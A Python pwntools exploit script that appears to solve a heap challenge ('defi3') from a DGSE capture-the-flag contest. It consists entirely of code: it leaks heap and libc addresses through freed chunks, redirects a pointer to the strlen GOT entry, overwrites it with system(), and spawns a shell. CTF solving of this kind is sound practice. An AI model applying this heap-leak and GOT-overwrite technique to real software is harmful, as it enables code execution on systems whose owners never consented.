DGSE challenge defi3 - heap

exploit.py

#!/usr/bin/python

from pwn import *

r = process("./defi3")


def allocate(nom,idx):

	r.sendline("1")
	r.sendline(nom)
	r.sendline(idx)

def show():
	r.recv()
	r.sendline("2")
	data= r.recvuntil("faire ?")
	return data

def free(idx,tofree):
	r.sendline("3")
	r.sendline(idx)
	r.sendline(tofree)

def edit(nmorid,idx,data):
	if nmorid=="nom":
		r.sendline("4")
	elif nmorid=="id":
		r.sendline("5")

	r.sendline(idx)
	r.sendline(data)

print "[+] CHUNCKS CREATED "
allocate("AAAAAAAA","BBBBBBBB")
allocate("CCCCCCCC","DDDDDDDD")
allocate("EEEEEEEE"*6,"FFFFFFFF"*6) 

r.recv()
pause()

print "[+] CHUNK FREEd"

free("1","2")
free("0","2")

print "[+] HEAP LEAK .. DONE"

heapleak = show()

HEAP = u32(heapleak.strip().split(": ")[1].split("\n")[0])
HEAP_BASE = HEAP - 0x15c0

print "[+] HEAP LEAK : ",hex(HEAP)
print "[+] HEAP BASE : ",hex(HEAP_BASE)

edit("nom","0",p32(HEAP_BASE+0x1520))
allocate("\x30\x20\x60","RRRRRRRR") #overwrite pointer to strlen GOT

r.recv()
libcleak = show()
LIBC_strlen =u64(libcleak.strip().split(": ")[1].split("\n")[0].ljust(8,"\x00"))
LIBC_base = LIBC_strlen - 0x8b720
LIBC_system= LIBC_base + 0x45390

print "[+] LIBC LEAK : ",hex(LIBC_strlen)
print "[+] LIBC BASE : ",hex(LIBC_base)


pld =p64(LIBC_system)[:-3]+"\x7f"

edit("nom","0",pld) # overwrite strlen GOT to system()
r.sendline("sh")
r.interactive()